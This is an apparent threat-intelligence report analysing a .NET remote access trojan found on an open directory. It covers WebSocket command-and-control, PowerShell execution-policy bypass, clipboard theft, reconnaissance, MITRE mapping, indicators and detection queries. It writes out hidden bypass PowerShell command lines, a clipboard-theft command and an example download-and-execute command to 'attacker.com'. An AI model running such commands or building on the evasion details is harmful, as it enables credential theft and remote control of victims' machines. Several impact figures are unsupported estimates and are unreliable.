Open Directory Investigation: This sample was discovered on an open directory hosted at IP address 109.230.231.37, representing an active malware distribution point. The presence of multiple RAT variants and trojans on this infrastructure suggests organized malware distribution operations targeting opportunistic victims. FleetAgentFUD.exe is the fifth sample analyzed from this source, exhibiting distinctly different operational characteristics compared to the persistence-focused FleetAgentAdvanced.exe. To see all other reports from this investigation see Executive Overview

Campaign Identifier: Arsenal-237-109.230.231.37-Malware-Repository

Last Updated: January 11, 2026

---

BLUF (Bottom Line Up Front)

Executive Summary

Business Impact Summary

FleetAgentFUD.exe is a HIGH-severity Remote Access Trojan (RAT) employing “Fully Undetectable” (FUD) design philosophy through minimal file size, WebSocket-based command and control, and aggressive anti-detection techniques. This .NET-compiled malware provides complete remote system access through PowerShell command execution, clipboard data theft, file download capabilities, and comprehensive system reconnaissance - all while evading traditional antivirus detection through FUD evasion tactics.

Unlike its companion malware FleetAgentAdvanced.exe (discovered on the same infrastructure), FleetAgentFUD.exe prioritizes immediate operational access over long-term persistence. The malware operates as a network-dependent agent requiring active C2 connectivity, using WebSocket protocol to masquerade as legitimate HTTPS upgrade traffic. Its built-in PowerShell Execution Policy bypass (-NoP -NonI -W Hidden -Exec Bypass) enables arbitrary command execution without triggering standard PowerShell security controls.

Critical capabilities include encrypted WebSocket C2 communications with custom authentication (X-Agent-Secret header), MD5-based machine fingerprinting for victim tracking, clipboard monitoring for credential theft, and file download functionality for deploying additional payloads or ransomware. The malware’s remarkably small file size (17,920 bytes / 17.5 KB) suggests highly optimized code designed specifically for detection evasion, aligning with underground “FUD” (Fully Undetectable) malware-as-a-service offerings.

Key Risk Factors

Risk Factor	Score	Business Impact
Overall Risk	8.2/10	HIGH - Requires immediate response
Remote Command Execution	9.5/10	Complete system control via PowerShell bypass - lateral movement, credential theft, ransomware deployment
Detection Evasion (FUD)	9.0/10	Designed to bypass antivirus; minimal static signatures; WebSocket protocol hiding
Credential Theft Risk	8.5/10	Clipboard monitoring captures credentials, MFA codes, passwords typed by users
Network Protocol Evasion	8.0/10	WebSocket upgrade pattern mimics legitimate HTTPS traffic; evades traditional C2 detection
Data Exfiltration Capability	8.0/10	PowerShell execution + file download enables arbitrary data exfiltration and file theft
Remediation Complexity	6.0/10	Network-dependent model simplifies remediation; no persistent backdoor observed

Recommended Actions

1. ISOLATE systems showing suspicious processes with WebSocket connections or hidden PowerShell execution
2. BLOCK distribution infrastructure: IP 109.230.231.37 at network perimeter (firewall, IPS/IDS)
3. DEPLOY WebSocket traffic inspection and behavioral detection rules for FUD malware patterns
4. HUNT enterprise-wide for file hash (SHA256: 072ce701ec0252eeddd6a0501555296bce512a7b90422addbb6d3619ae10f4ff)
5. MONITOR network for WebSocket upgrade patterns and encrypted C2 traffic from untrusted executables
6. ROTATE credentials for all users on confirmed or suspected infected systems (assume clipboard compromise)
7. INVESTIGATE network logs for connections to 109.230.231.37 to identify patient zero and infection vector

---

Table of Contents

• Quick Reference
• File Identification
• Executive Technical Summary
• Deep Technical Analysis
  • What Makes This “FUD” (Fully Undetectable)?
  • WebSocket Command & Control Architecture
  • PowerShell Command Execution Capability
  • Clipboard Data Theft Mechanism
  • File Download & Payload Deployment
  • System Reconnaissance & Profiling
  • Memory Protection Manipulation
• MITRE ATT&CK Mapping
• Frequently Asked Questions
• IOCs
• Detections

---

Quick Reference

Detections & IOCs:

• FleetAgentFUD.exe Detection Rules
• FleetAgentFUD.exe IOCs

---

File Identification

Primary Sample:

• Original Filename: FleetAgentFUD.exe
• SHA256: 072ce701ec0252eeddd6a0501555296bce512a7b90422addbb6d3619ae10f4ff
• SHA1: 51aa8b08dc67cb91435ce58d4453a8ae5e0dd577
• MD5: 5b37f5fc42384834b7aac5081a5bac85
• File Size: 17,920 bytes (approx 17.5 KB)
• Type: PE32 executable (GUI) Intel 80386, .NET compiled
• Compilation: Microsoft Visual C# .NET, CLR v4.0.30319
• Malware Type: Remote Access Trojan (RAT) with FUD Evasion
• Distribution Source: IP 109.230.231.37 (CONFIRMED)
• Agent Version: 3.0.0 (embedded version string)

Discovery Context: This sample was discovered on an open directory at IP address 109.230.231.37 alongside other malware families (PoetRAT, NjRAT/XWorm variants, FleetAgentAdvanced.exe), indicating an active malware distribution point serving multiple threat families to opportunistic victims. FleetAgentFUD.exe is the fifth distinct malware sample analyzed from this infrastructure.

File Characteristics:

• Entropy: 5.2171 (moderate - indicates some compression/encoding but not heavily packed)
• Digital Signature: NOT SIGNED (unsigned executable)
• Compiler: Microsoft Linker 11.0 + .NET Framework Legacy CLR v4.0.30319
• Subsystem: Windows GUI (hidden window execution)

---

Executive Technical Summary

Business Context

FleetAgentFUD.exe represents a professional-grade Remote Access Trojan optimized for detection evasion through “FUD” (Fully Undetectable) design principles. Unlike traditional RATs that prioritize long-term persistence, FleetAgentFUD.exe focuses on immediate operational access with minimal forensic footprint. Its remarkably small file size (17.5 KB) and WebSocket-based C2 protocol demonstrate deliberate engineering for antivirus evasion and network monitoring bypass.

The malware provides complete remote system access through PowerShell command execution with built-in Execution Policy bypass, enabling threat actors to execute arbitrary commands, deploy ransomware, steal credentials, exfiltrate data, and perform lateral movement - all without triggering standard PowerShell security controls. The clipboard monitoring functionality specifically targets credential theft, capturing passwords, MFA codes, and sensitive information as users type.

Key Business Impacts

• Complete Remote System Control: PowerShell execution with Execution Policy bypass provides unrestricted command execution capabilities
• Credential Theft: Clipboard monitoring captures passwords, MFA tokens, and sensitive data as users type
• Detection Evasion: FUD design bypasses traditional antivirus; WebSocket protocol evades network monitoring
• Rapid Post-Exploitation: File download capability enables immediate ransomware deployment or additional payload staging
• Network-Dependent Model: No observed disk-based persistence simplifies remediation but indicates real-time threat actor control
• Minimal Forensic Footprint: Small file size, hidden execution, and WebSocket protocol minimize detection and forensic evidence

Detection Challenges

• .NET Compilation: Inherent obfuscation and easy recompilation defeat signature-based detection
• FUD Design: Explicitly engineered to bypass antivirus detection through minimal static signatures
• WebSocket Protocol: Legitimate HTTPS upgrade traffic pattern evades traditional C2 detection signatures
• PowerShell Bypass: Built-in Execution Policy bypass circumvents standard PowerShell logging and security controls
• Small File Size: 17.5 KB footprint suggests highly optimized code with minimal detection surface
• Hidden Window Execution: GUI application runs invisibly, preventing visual detection by users

Executive Risk Assessment

HIGH RISK - FleetAgentFUD.exe’s FUD evasion capabilities, complete PowerShell execution access, and credential theft functionality create significant risk for data breach, ransomware deployment, and long-term compromise. The malware’s small size and WebSocket protocol indicate professional development targeting enterprise environments with modern security controls. Network-dependent operational model suggests real-time threat actor involvement rather than automated infections.

---

Deep Technical Analysis

What Makes This “FUD” (Fully Undetectable)?

Understanding “FUD” in Underground Malware Markets

“FUD” (Fully Undetectable) is underground marketplace terminology for malware specifically engineered to evade antivirus and EDR detection. FleetAgentFUD.exe demonstrates multiple FUD design principles:

FUD Design Characteristics:

1. Minimal File Size (17.5 KB) - Traditional RATs are 100-500 KB; FleetAgentFUD.exe achieves 17.5 KB through code optimization and minimal dependencies, reducing static signature detection surface.

2. Minimal Static Signatures - Entropy 5.2171 (moderate, avoiding packer triggers), 285 unique strings (vs 500+ typical RAT variants), dynamic API loading via GetProcAddress for runtime linking.

3. WebSocket Protocol Evasion - Legitimate HTTPS upgrade mechanism mimics web application traffic, no distinctive C2 beaconing patterns like HTTP GET/POST sequences.

4. .NET Compilation Benefits - Intermediate Language (IL) provides natural obfuscation, easy recompilation enables rapid signature evasion, cross-platform compatibility (Windows 7-11 with .NET Framework 4.0+).

5. No Traditional Persistence - Network-dependent operational model (requires active C2 connection), no registry Run keys, scheduled tasks, or startup folder entries observed.

FUD Market Context: Underground malware-as-a-service (MaaS) platforms commonly offer “FUD” variants for premium pricing. The naming “FleetAgentFUD.exe” suggests a commercial FUD variant specifically designed for detection evasion.

Technical Implementation

Code Optimization:

File Size: 17,920 bytes (17.5 KB)
Sections:
  .text:  14,848 bytes (82.8% - streamlined code)
  .rsrc:   2,048 bytes (11.4% - minimal resources)
  .reloc:    512 bytes (2.9% - relocation)

Evasion Capabilities:

• API Runtime Linking (T1129): GetProcAddress loads Windows APIs dynamically to avoid static import table analysis
• Memory Protection (VirtualProtect): Modify memory to RWX for runtime code execution, shellcode deployment
• Hidden Window (T1564.003): ShowWindow(SW_HIDE) ensures no visible window despite GUI application

WebSocket Command & Control Architecture

Protocol Overview

FleetAgentFUD.exe implements WebSocket protocol for C2 communications, providing advantages over traditional HTTP/HTTPS channels:

WebSocket Advantages:

• Legitimate Traffic Pattern: Appears as standard web application traffic (Slack, Discord, web chat)
• Bi-Directional Communication: Full-duplex channel enables real-time command delivery without polling
• Single Connection: Persistent connection without repeated attempts that trigger IDS rules
• Encrypted Channel: WebSocket over TLS (wss://) provides encrypted communications
• Firewall Traversal: Uses standard HTTPS ports (443), bypasses restrictive firewalls

WebSocket Handshake:

String Analysis - WebSocket Headers:
"Connection: Upgrade"
"Sec-WebSocket-Key: "
"Sec-WebSocket-Version: 13"
"X-Agent-Secret: " (custom authentication)

Handshake Process:
1. Client initiates HTTP connection to C2 server (likely port 443/HTTPS)
2. Client sends HTTP Upgrade request with WebSocket headers
3. Custom authentication via "X-Agent-Secret" header
4. Server responds with HTTP 101 Switching Protocols
5. Connection upgrades to WebSocket for bi-directional communication

Registration Message:

JSON Structure:
"type": "register"
"machine_id": [MD5 hash of username]
"hostname": [VICTIM_HOSTNAME]
"os_version": [OS_VERSION_STRING]
"ip_address": [VICTIM_IP]
"agent_ver": "3.0.0"

Command Structure:

Command Fields:
"command_id": [UNIQUE_COMMAND_ID]
"cmd_type": [COMMAND_TYPE]
"command": [COMMAND_PAYLOAD]

Command Types:
- "powershell": Execute arbitrary PowerShell command
- "sysinfo": Detailed system information
- "processes": List running processes
- "disk": Enumerate disk drives and storage
- "network": Network configuration and adapters
- "users": List local user accounts
- "clipboard": Steal clipboard contents
- "firewall": Windows Firewall configuration
- "exit": Terminate agent connection

Detection Challenges:

• No Beaconing Pattern: Single persistent connection vs traditional HTTP C2 repeated requests
• Legitimate Protocol: WebSocket used by many legitimate applications
• Encrypted Channel: wss:// encrypts all command/response traffic
• Standard Ports: Port 443 blends with normal HTTPS traffic

Detection Requirements: TLS/SSL inspection, behavioral analysis for untrusted WebSocket connections, User-Agent analysis (malware lacks typical browser User-Agent), certificate validation (untrusted or self-signed certificates).

PowerShell Command Execution Capability

Execution Policy Bypass

PowerShell Invocation:

String: "-NoP -NonI -W Hidden -Exec Bypass -C "

Full Command Breakdown:
-NoP         = -NoProfile (skip loading PowerShell profile scripts)
-NonI        = -NonInteractive (no interactive prompts)
-W Hidden    = -WindowStyle Hidden (invisible PowerShell window)
-Exec Bypass = -ExecutionPolicy Bypass (disable script execution restrictions)
-C           = -Command (execute following command string)

Why This Bypass Is Critical:

• Traditional PowerShell Execution Policy (Restricted, AllSigned, RemoteSigned) blocks script execution
• -ExecutionPolicy Bypass parameter completely bypasses protection for that PowerShell instance
• No administrator rights required - works at user level
• No audit trail unless PowerShell script block logging enabled

Business Impact: Traditional PowerShell security controls completely bypassed; users with standard privileges can execute arbitrary PowerShell commands for credential theft, lateral movement, and ransomware deployment.

Command Execution Process

Process Creation:

CAPA Capability: "create a process with modified I/O handles and window"

Process Flow:
1. Construct: "-NoP -NonI -W Hidden -Exec Bypass -C [COMMAND]"
2. Create Process object with FileName = "powershell.exe"
3. Configure CreateNoWindow = true, WindowStyle = Hidden
4. Configure RedirectStandardOutput = true (capture results)
5. Execute: Process.Start()
6. Read output: Process.StandardOutput.ReadToEnd()
7. Send output to C2 via WebSocket

Attack Capabilities:

• Credential Harvesting: Deploy Mimikatz or credential dumping tools via PowerShell
• Lateral Movement: Enumerate Active Directory, identify target systems for compromise
• Ransomware Deployment: Download and execute ransomware scripts (fileless execution)
• Kerberoasting: Extract Kerberos service tickets for offline credential cracking

Detection:

PowerShell Logging (ESSENTIAL):
- EventID 4103: Module Logging
- EventID 4104: Script Block Logging (captures "-Exec Bypass" patterns)
- EventID 4688: Process creation - powershell.exe with bypass arguments
- Sysmon EventID 1: Process creation with CommandLine containing bypass parameters

See: Detection Package for Splunk/SIEM queries

Mitigation:

• Application Whitelisting (AppLocker) to block powershell.exe from AppData
• PowerShell Constrained Language Mode (limits cmdlets to basic operations)
• Just Enough Administration (JEA) to restrict PowerShell access per role
• Enhanced Logging (Module + Script Block + Transcription)

Clipboard Data Theft Mechanism

Technical Implementation

Clipboard Monitoring:

String Analysis:
"clipboard"
"Get-Clipboard"

PowerShell Command:
-NoP -W Hidden -C Get-Clipboard

Attack Flow:
1. C2 sends clipboard monitoring command (periodic polling every 5-10 seconds)
2. FleetAgentFUD.exe executes: powershell.exe -NoP -W Hidden -C Get-Clipboard
3. PowerShell retrieves clipboard contents (text, file paths, images)
4. Data exfiltrated to C2 via WebSocket in real-time

Attack Scenarios

Password Theft: User copies password from password manager → Clipboard monitoring captures password → Exfiltrated to attacker before clipboard cleared.

MFA Token Theft: User copies 6-digit MFA code from authenticator app → Real-time monitoring captures code → Attacker uses captured code for account access (valid 30-60 seconds).

Cryptocurrency Wallet Theft: Captures wallet addresses copied for transactions (NOTE: FleetAgentFUD.exe shows only monitoring, not manipulation, but PowerShell capability enables clipboard replacement if commanded).

Sensitive Document Theft: Social Security Numbers, credit cards, VPN credentials, SSH keys, internal company secrets captured during normal copy/paste workflows.

Business Impact

Severity Assessment:

CRITICAL Severity
- Credential Compromise: 95% of users copy passwords weekly
- MFA Bypass: Captured tokens enable account access within validity window
- Confidential Data Leakage: Business secrets, PII, financial data
- Regulatory Compliance: GDPR, HIPAA, PCI-DSS violations

Financial Impact (500-user enterprise, 50% infection rate):
- Credential reset cost: $62,500/week
- Data breach investigation: $50,000-$150,000
- Regulatory fines: $100,000-$1,000,000+
- Total Potential Cost: $212,500-$1,312,500+

Detection:

PowerShell Logging (EventID 4104):
ScriptBlockText="Get-Clipboard"
Behavioral Pattern: >10 executions per hour from same parent process

SIEM Detection:
index=windows EventID=4104 ScriptBlockText="Get-Clipboard"
| stats count by ComputerName, User
| where count > 10

Mitigation:

• Password manager autofill (bypasses clipboard entirely)
• Clipboard encryption tools (CopyLock, ClipMate)
• Automatically clear clipboard after 30 seconds (GPO)
• Alert on PowerShell Get-Clipboard execution via EDR

File Download & Payload Deployment

Technical Capability

File Download Implementation:

CAPA Capability: "download URL"
API: DownloadFile

Implementation:
System.Net.WebClient.DownloadFile(url, destinationPath)

Command Structure (Inferred):
{
  "cmd_type": "download",
  "command": {
    "url": "http://attacker.com/payload.exe",
    "destination": "C:\\Users\\Public\\payload.exe",
    "execute": true
  }
}

Attack Scenarios

Ransomware Deployment: Download ransomware payload → Stage without execution → Coordinated deployment across all infected systems → Enterprise-wide encryption.

Cobalt Strike Beacon: Deploy professional post-exploitation framework enabling process injection, credential dumping (Mimikatz), lateral movement (PsExec, WMI), Kerberoasting, data exfiltration, proxy pivoting for internal network access.

Cryptocurrency Miner: Deploy XMRig or similar miner → Hijack CPU/GPU resources (90-100% utilization) → Increased electricity costs, performance degradation, hardware wear.

Credential Stealer: Deploy specialized tools to extract browser credentials (Chrome, Firefox, Edge), Windows Credential Manager data, email client credentials, FTP/SSH credentials, cryptocurrency wallet data.

Detection & Mitigation

Network Detection:

Firewall/IDS Alerts:
- Outbound HTTP connections from .NET executables in AppData
- Executable downloads (.exe, .dll, .scr, .bat, .ps1) from unknown sources
- User-Agent: .NET WebClient distinctive signature
  "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)"

Endpoint Detection:

Sysmon EventID 11 (File Created):
TargetFilename: C:\Users\Public\*.exe OR C:\Windows\Temp\*.exe
Image: FleetAgentFUD.exe OR suspicious .NET process

Behavioral Pattern:
1. Network connection from AppData executable
2. File creation in Public or Temp folder
3. Process execution from Public or Temp folder
4. Timeline: All within 30-60 seconds (automated download-execute)

See: Detection Package for SIEM correlation rules

Mitigation:

• Application Whitelisting (AppLocker/WDAC): Block execution from AppData, Public, Temp directories
• Web Filtering: Block .exe, .dll, .scr downloads; whitelist trusted software domains
• Endpoint Protection: EDR with behavioral detection for download-execute patterns
• Network Segmentation: Restrict outbound internet access from workstations

System Reconnaissance & Profiling

Reconnaissance Capabilities

System Information Discovery (T1082):

CAPA: "get OS version in .NET" → OSVersion
       "get hostname" → MachineName

Example Output:
OS Version: Microsoft Windows NT 10.0.19045.0
Hostname: WORKSTATION-5423

User Discovery (T1033, T1087):

CAPA: "get session user name" → UserName, GetCurrent
      "get session integrity level" → IsInRole

Purpose: Determine privilege level (standard user vs administrator)

Network/Process/Disk/User/Firewall Enumeration:

Detected Capabilities:
- Network: ipconfig /all (identify internal IP, domain membership, DNS servers)
- Processes: Get-Process (identify security software, high-value processes)
- Disk: Get-WmiObject Win32_LogicalDisk (identify data volume, network shares)
- Users: net user / Get-LocalUser (identify admin accounts, service accounts)
- Firewall: netsh advfirewall show allprofiles (identify blocking rules)

Reconnaissance Attack Timeline

Phase 1 - Initial Registration (T+0-5 min):

1. Malware connects to C2 server
2. Registration message sent with basic victim info (machine_id, hostname, OS, IP, agent version)
3. C2 operator sees new victim in infected hosts list
4. Initial assessment: Workstation vs Server? OS version for exploit compatibility?

Phase 2 - Automated Profiling (T+5-30 min):

C2 sends automated reconnaissance:
- sysinfo: CPU, RAM, OS build, domain membership
- processes: Identify EDR agents (CrowdStrike, SentinelOne, Carbon Black)
- network: Domain membership? Internal IP range? DNS = AD environment?
- users: Admin accounts? Service accounts?
- disk: Storage capacity? Network shares for lateral movement?

Phase 3 - Manual Operator Analysis (T+30 min - 24 hours):

Operator categorizes victim:

High-Value Indicators:
- Domain-joined (company.local)
- Administrator access
- Large storage (>500GB)
- Mapped network drives
- No EDR detected

Decision:
High-Value → Lateral movement + ransomware deployment
Low-Value → Cryptocurrency mining or credential theft

Phase 4 - Targeted Operations (T+24 hours+):

Enterprise Target: Cobalt Strike → AD enumeration → Lateral movement → Coordinated ransomware
Home User: Cryptocurrency miner deployment
Medium-Value: Credential stealer → Sell credentials on underground markets

Business Impact

Reconnaissance Risk Multiplier:

Without Reconnaissance:
- Blind ransomware deployment
- Low success rate: 20-30%

With Reconnaissance (FleetAgentFUD.exe):
- Targeted attack after environment profiling
- Identify high-value enterprise targets
- Success rate: 70-85%

Impact: Reconnaissance multiplies attack success rate by 2.5-4x

Financial Impact Example:

Initial Infection: Single workstation

With Reconnaissance:
- Identifies: 5,000-user enterprise, 50TB file servers, no EDR
- Attacker deploys ransomware across entire domain
- Demand: $5,000,000
- Company faces: $5,000,000 total loss (recovery + downtime)

Without Reconnaissance:
- Single workstation encrypted
- Demand: $5,000
- Company restores from backup, minimal impact

Impact Multiplier: 1000x increase in damage due to reconnaissance

Memory Protection Manipulation

VirtualProtect Capability

CAPA Detection:

Capabilities:
- "allocate or change RWX memory" → VirtualProtect
- "change memory protection" → VirtualProtect

Dangerous Protection Flag:
PAGE_EXECUTE_READWRITE (0x40) = RWX permissions
- Read: Process can read memory
- Write: Process can write to memory
- Execute: Process can execute code from memory

Why RWX Memory Is Dangerous:

Normal Application Memory:
- Code sections: Read-Execute (RX) - can run but not modify
- Data sections: Read-Write (RW) - can read/write but not execute
- Separation prevents code injection

Malware RWX Memory:
- Read-Write-Execute (RWX) - can write code AND execute it
- Enables runtime code modification, shellcode execution, process injection
- Primary indicator of malicious code execution

Potential Attack Techniques:

1. Shellcode Execution: Allocate RWX memory → Download shellcode from C2 → Write to RWX memory → Execute shellcode (reverse shell, credential dumper, exploit). Benefits: Fileless attack, signature-based AV cannot scan in-memory code.

2. Process Injection Preparation: NOTE - FleetAgentFUD.exe has VirtualProtect but CAPA did NOT detect VirtualAllocEx or CreateRemoteThread. Assessment: Process injection POSSIBLE but NOT confirmed; likely use is local shellcode execution.

3. Runtime Code Unpacking: Malware contains encrypted code → Allocates RWX memory → Decrypts code into RWX → Executes unpacked code. FleetAgentFUD.exe entropy 5.2171 suggests NOT heavily packed, but may decrypt config/shellcode at runtime.

4. JIT Compilation: .NET Framework uses JIT compilation requiring RWX memory. Malware can abuse .NET Reflection.Emit to dynamically generate malicious code at runtime, evading static analysis.

Detection & Mitigation

Detection:

Windows API Monitoring:
- Monitor VirtualProtect calls from .NET executables
- Alert on PAGE_EXECUTE_READWRITE protection flag
- Correlate with suspicious behaviors (network connections, PowerShell execution)

NOTE: Sysmon does not natively detect VirtualProtect
Requires: EDR with API hooking (CrowdStrike, SentinelOne, Defender for Endpoint)

See: Detection Package for EDR queries

Mitigation:

• Exploit Protection (Windows Defender): Enable “Arbitrary Code Guard” (ACG) - prevents unsigned code in RWX memory
• Control Flow Guard (CFG): Prevents code execution from unexpected memory locations
• EDR Behavioral Detection: Alert on VirtualProtect(PAGE_EXECUTE_READWRITE) from untrusted processes
• Application Whitelisting: Block unsigned .NET executables from AppData

---

MITRE ATT&CK Mapping

This section maps FleetAgentFUD.exe’s observed behaviors and capabilities to the MITRE ATT&CK framework, providing standardized categorization for threat intelligence sharing and detection engineering.

Tactics & Techniques Overview

Tactic	Technique ID	Technique Name	Confidence
Execution	T1059.001	Command and Scripting Interpreter: PowerShell	CONFIRMED
Execution	T1204.002	User Execution: Malicious File	CONFIRMED
Defense Evasion	T1140	Deobfuscate/Decode Files or Information (Base64)	CAPABLE
Defense Evasion	T1027	Obfuscated Files or Information	CONFIRMED
Defense Evasion	T1564.003	Hide Artifacts: Hidden Window	CONFIRMED
Defense Evasion	T1562.001	Impair Defenses: Disable or Modify Tools (PowerShell Execution Policy Bypass)	CONFIRMED
Defense Evasion	T1055	Process Injection (Potential - VirtualProtect API)	POSSIBLE
Defense Evasion	T1129	Shared Modules (Runtime API Loading - GetProcAddress)	CAPABLE
Discovery	T1082	System Information Discovery	CONFIRMED
Discovery	T1033	System Owner/User Discovery	CONFIRMED
Discovery	T1087	Account Discovery	CAPABLE
Discovery	T1083	File and Directory Discovery	CAPABLE
Collection	T1115	Clipboard Data	CONFIRMED
Collection	T1005	Data from Local System	LIKELY
Command and Control	T1071.001	Application Layer Protocol: Web Protocols (WebSocket)	CONFIRMED
Command and Control	T1573	Encrypted Channel	LIKELY
Command and Control	T1001.002	Data Obfuscation: Steganography (WebSocket Protocol Hiding)	POSSIBLE
Exfiltration	T1041	Exfiltration Over C2 Channel	LIKELY
Impact	T1486	Data Encrypted for Impact (Ransomware Deployment Capability)	POSSIBLE

Detailed Technique Analysis

T1059.001 - Command and Scripting Interpreter: PowerShell

Confidence: CONFIRMED

Evidence:

• String: "powershell", "-NoP -NonI -W Hidden -Exec Bypass -C "
• CAPA: “create a process with modified I/O handles and window”
• Command types: “powershell”, “sysinfo”, “processes”, “disk”, “network”, “users”, “clipboard”, “firewall”

Implementation:

PowerShell Invocation:
powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -Command "[COMMAND]"

Capabilities:
- Arbitrary PowerShell execution from C2
- Execution Policy bypass (defeats PowerShell security controls)
- Hidden window (invisible to user)
- Output redirection (results sent to C2)

Business Impact: Complete PowerShell access enables credential theft, lateral movement, ransomware deployment, data exfiltration.

Detection:

• EventID 4103/4104: PowerShell Module/Script Block Logging
• EventID 4688: Process creation with “-ExecutionPolicy Bypass”
• Sysmon EventID 1: powershell.exe with bypass parameters from suspicious parent

See: Detection Package

Mitigation:

• PowerShell Constrained Language Mode
• Application Whitelisting (AppLocker)
• Comprehensive PowerShell logging (Module + Script Block + Transcription)
• Just Enough Administration (JEA)

---

T1115 - Clipboard Data

Confidence: CONFIRMED

Evidence:

• Strings: "clipboard", "Get-Clipboard"
• PowerShell command structure for clipboard monitoring

Implementation:

Command: {"cmd_type": "clipboard", "command": null}
PowerShell: powershell.exe -NoP -W Hidden -C Get-Clipboard

Captured Data: Passwords, MFA codes, confidential information, file paths
Exfiltration: Real-time via WebSocket C2

Business Impact:

• Credential Compromise: 95% of users copy passwords weekly
• MFA Bypass: Captured 6-digit codes valid 30-60 seconds
• Confidential Data Leakage: Business secrets, PII, financial data
• Regulatory Violations: GDPR, HIPAA, PCI-DSS breaches

Detection:

PowerShell EventID 4104: ScriptBlockText="Get-Clipboard"
Behavioral Pattern: >10 executions per hour

SIEM:
index=windows EventID=4104 ScriptBlockText="Get-Clipboard"
| stats count by ComputerName
| where count > 10

Mitigation:

• Password manager autofill (bypasses clipboard)
• Clipboard encryption tools (CopyLock, ClipMate)
• Auto-clear clipboard after 30 seconds (GPO)
• Alert on Get-Clipboard via EDR

---

T1071.001 - Application Layer Protocol: Web Protocols (WebSocket)

Confidence: CONFIRMED

Evidence:

• Strings: "Connection: Upgrade", "Sec-WebSocket-Key: ", "Sec-WebSocket-Version: 13", "X-Agent-Secret: "
• CAPA: “act as TCP client” (TcpClient, NetworkStream)
• Registration, heartbeat, command message structure

Implementation:

WebSocket Handshake:
GET / HTTP/1.1
Host: [C2_SERVER]
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: [RANDOM_KEY]
X-Agent-Secret: [AUTHENTICATION_SECRET]

Bi-Directional Communication:
- C2 → Agent: JSON commands
- Agent → C2: JSON responses (command output, stolen data)
- Heartbeat: {"type":"heartbeat"}

Why WebSocket Evades Detection:

• Legitimate protocol (Slack, Discord, web apps)
• No beaconing pattern (single persistent connection)
• Encrypted (wss:// over TLS)
• Standard ports (80/443)

Detection:

Network Monitoring:
- TLS/SSL inspection for WebSocket traffic
- Monitor WebSocket from .NET executables in AppData
- User-Agent anomalies (.NET WebClient vs browser)
- Certificate analysis (self-signed/untrusted)

Sysmon EventID 3:
Image: FleetAgentFUD.exe OR AppData\*.exe
DestinationPort: 443
Protocol: TCP

Mitigation:

• TLS/SSL inspection proxy
• Block WebSocket from untrusted executables (AppLocker, EDR)
• Network segmentation
• Certificate monitoring

---

T1027 - Obfuscated Files or Information

Confidence: CONFIRMED

Evidence:

• CAPA: “encode data using Base64” (ToBase64String)
• .NET compilation (IL obfuscation)
• String: “contains_base64” (YARA detection)
• FUD design (minimal static signatures)

Implementation:

• Base64 encoding for C2 transmission
• .NET IL obfuscation layer
• Minimal file size (17.5 KB) reduces signature surface
• Entropy 5.2171 (avoids packer detection triggers)

Business Impact:

• Signature-based AV ineffective
• Static analysis challenges delay identification
• Requires behavioral EDR
• Increases dwell time (undetected longer)

Detection:

• Entropy analysis (5-7 range = moderate obfuscation)
• .NET metadata inspection (dnSpy decompilation)
• YARA rules targeting Base64 + .NET APIs
• Behavioral sandbox execution

Mitigation:

• EDR with .NET malware analysis
• Sandbox execution environment
• YARA rules for obfuscation patterns
• Application whitelisting (block unsigned .NET)

---

T1562.001 - Impair Defenses: Disable or Modify Tools

Confidence: CONFIRMED

Evidence:

• String: "-NoP -NonI -W Hidden -Exec Bypass -C "
• PowerShell Execution Policy bypass

Implementation:

PowerShell Execution Policy Bypass:
-ExecutionPolicy Bypass

Normal State:
Get-ExecutionPolicy → "Restricted"
.\script.ps1 → ERROR: Script execution blocked

Bypassed State:
powershell.exe -ExecutionPolicy Bypass -File script.ps1
→ Executes without restriction

Business Impact:

• PowerShell protection rendered ineffective
• Standard users execute arbitrary commands
• Credential theft, lateral movement, ransomware deployment
• Requires additional controls (AppLocker, EDR)

Detection:

• EventID 4688: powershell.exe with “-Exec Bypass”
• EventID 4104: Script Block Logging
• Sysmon EventID 1: bypass parameters from suspicious parent

See: Detection Package

Mitigation:

• Constrained Language Mode (Group Policy)
• AppLocker: Block powershell.exe from AppData parents
• JEA: Limit cmdlets per role
• Enhanced Logging (Module + Script Block + Transcription)

---

Kill Chain Mapping

Kill Chain Phase	Observed Activity	Status
Initial Access	Unknown (likely phishing, malicious download, drive-by compromise)	UNKNOWN
Execution	User executes FleetAgentFUD.exe; PowerShell command execution	CONFIRMED
Persistence	Not observed (network-dependent operational model)	NONE OBSERVED
Privilege Escalation	Potential process injection (VirtualProtect API present)	CAPABLE
Defense Evasion	FUD design, Base64 encoding, hidden window, PowerShell bypass, runtime API loading	CONFIRMED
Credential Access	Clipboard monitoring (password theft, MFA token capture)	CONFIRMED
Discovery	System info, hostname, OS version, user enumeration, network config, process list, disk info	CONFIRMED
Lateral Movement	PowerShell capability enables lateral movement (not directly observed)	CAPABLE
Collection	Clipboard data, system reconnaissance output	CONFIRMED
Command and Control	WebSocket protocol, encrypted channel, registration + heartbeat mechanism	CONFIRMED
Exfiltration	Data exfiltration over WebSocket C2 channel	LIKELY
Impact	Ransomware deployment capability (file download + execution)	CAPABLE

---

Frequently Asked Questions

For Security Analysts

Q: How do I detect FleetAgentFUD.exe on my network?

A: Multi-layered detection required due to FUD evasion:

File Hash Detection:

# Hunt for known FleetAgentFUD.exe hash
$targetHash = "072ce701ec0252eeddd6a0501555296bce512a7b90422addbb6d3619ae10f4ff"
$searchPaths = @("$env:USERPROFILE\Downloads", "$env:TEMP", "$env:APPDATA", "$env:LOCALAPPDATA")

foreach ($path in $searchPaths) {
    if (Test-Path $path) {
        Get-ChildItem $path -Recurse -File -Include "*.exe" -ErrorAction SilentlyContinue |
        Where-Object { (Get-FileHash $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash -eq $targetHash }
    }
}

Behavioral Detection:

• PowerShell Execution Policy bypass in logs (EventID 4104 with “-ExecBypass”)
• WebSocket connections from .NET executables in AppData
• Outbound connections to 109.230.231.37 (distribution infrastructure)
• Repeated small data transfers (heartbeat pattern) from untrusted executables

Network Detection:

• WebSocket upgrade connections from .NET executables in AppData
• TLS connections with suspicious User-Agent (not browser-based)
• Certificate anomalies (self-signed/untrusted)

Q: FleetAgentFUD.exe vs FleetAgentAdvanced.exe - What’s the difference?

A: Distinctly different malware from same distribution infrastructure:

Characteristic	FleetAgentAdvanced.exe	FleetAgentFUD.exe
Primary Goal	Long-term persistence	Immediate remote access
File Size	172 KB	17.5 KB
